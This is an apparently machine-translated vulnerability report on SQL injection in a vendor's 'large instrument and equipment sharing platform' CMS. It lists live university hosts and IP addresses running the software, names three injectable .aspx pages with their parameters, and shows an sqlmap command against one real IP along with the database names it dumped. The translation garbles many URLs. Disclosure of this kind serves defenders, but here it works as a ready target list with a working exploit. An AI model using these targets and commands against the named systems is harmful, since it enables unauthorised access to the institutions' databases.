Multiple SA permissions of CMS on a device sharing platform: SQL Injection and packaging #3
This problem is the vendor developed the "large instrument and equipment sharing platform system" Introduction: http://www.wanxinsoft.com/product1_1.asp
Some cases:
The http://sys.zafu.edu.cn: 81/
Http: // 210.27.176.162/
Http://sys.zafu.edu.cn/dy/
Http: // 202.114.168.176/
Http: // 59.69.101.10/
Vulnerability files exist in:
/Model/TwoGradePage/NewsMore. aspx
/Model/TwoGradePage/devTrans. aspx
/Model/TwoGradePage/LookShiYanShi. aspx
Among the three files!
Vulnerability exploitation Demonstration:
Http: // 202.114.168.176/model/TwoGradePage/NewsMore. aspx? ColumnId = 97
Http: // 202.114.168.176/model/TwoGradePage/devTrans. aspx? Devcode = DL000001
Http: // 202.114.168.176/model/TwoGradePage/LookShiYanShi. aspx? LID = 292 & columnId = 98
Sqlmap. py-u "http: // 202.114.168.176/model/TwoGradePage/NewsMore. aspx? ColumnId = 97 "-- dbs
Available databases [6]:
[*] Master
[*] Model
[*] Msdb
[*] Northwind
[*] Pubs
[*] Tempdb
Solution:
Enhanced Filtering